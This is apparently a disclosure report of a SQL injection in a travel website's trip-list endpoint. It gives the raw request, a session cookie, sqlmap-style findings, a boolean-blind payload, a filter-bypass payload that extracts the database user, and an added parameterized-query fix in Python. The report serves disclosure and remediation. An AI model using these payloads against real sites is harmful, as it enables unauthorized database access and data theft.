Alimama travel website has SQL Injection
(⊙ O ⊙ )...
When a problem turns up at one point, check every similar point for the same problem ....

POST /lvyou/dest_index/AjaxGetTripList HTTP/1.1
Content-Length: 66
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.lvmama.com/lvyou/
Cookie: uid=wKgKcFZNZmCynk9+CC/NAg==; lvsessionid=ca316cb1-37b6-41aa-af9a-5db2150f34c7_14207119
Host: www.lvmama.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

dest_id=2&page=3&sort_field=time

---
Parameter: dest_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dest_id=2 AND 1647=1647&page=3&sort_field=time
---
web application technology: PHP 5.5.20
back-end DBMS: MySQL 5

was filtered. Directly bypass.

Payload: dest_id=2 and ascii(mid(lower(user()from(1)for(1)=108

current user: '[email protected]'

Solution:
Fix
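
One way to implement the fix for the three POST fields in the request above, shown as an added example that is not from the original report or the site's code. It uses Python with an in-memory SQLite database as a stand-in for the PHP/MySQL stack; the table, column names, page size and sample rows are assumptions.

```python
import sqlite3

PAGE_SIZE = 10  # assumed page size
# ORDER BY needs a column identifier, which a bound parameter cannot carry,
# so sort_field is mapped through a fixed allowlist (column names assumed).
SORT_COLUMNS = {"time": "time", "price": "price"}


def make_db():
    """Constructed sample data standing in for the trip list table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE trips (dest_id INTEGER, title TEXT, time INTEGER, price INTEGER)")
    db.executemany(
        "INSERT INTO trips VALUES (?, ?, ?, ?)",
        [(2, "A", 30, 500), (2, "B", 10, 900), (7, "C", 20, 100)],
    )
    return db


def list_trips_vulnerable(db, form):
    # 'Before': dest_id is concatenated into the SQL text, so the reported
    # payload "2 AND 1647=1647" is parsed as part of the WHERE clause.
    sql = "SELECT title FROM trips WHERE dest_id = " + form["dest_id"]
    return [row[0] for row in db.execute(sql)]


def list_trips_fixed(db, form):
    # Numeric fields: accept short ASCII digit strings only, then bind them.
    for key in ("dest_id", "page"):
        value = form.get(key, "")
        if not (value.isascii() and value.isdigit() and len(value) <= 9):
            raise ValueError(f"invalid {key}")
    page = int(form["page"])
    if page < 1:
        raise ValueError("invalid page")
    column = SORT_COLUMNS.get(form.get("sort_field", "time"))
    if column is None:
        raise ValueError("invalid sort_field")
    # Only the allowlisted identifier is formatted in; all values are bound.
    sql = f"SELECT title FROM trips WHERE dest_id = ? ORDER BY {column} LIMIT ? OFFSET ?"
    params = (int(form["dest_id"]), PAGE_SIZE, (page - 1) * PAGE_SIZE)
    return [row[0] for row in db.execute(sql, params)]
```

In the fixed handler the boolean-blind payload never reaches the database: it fails the digit check, and even a value that passed would be compared as data rather than parsed as SQL.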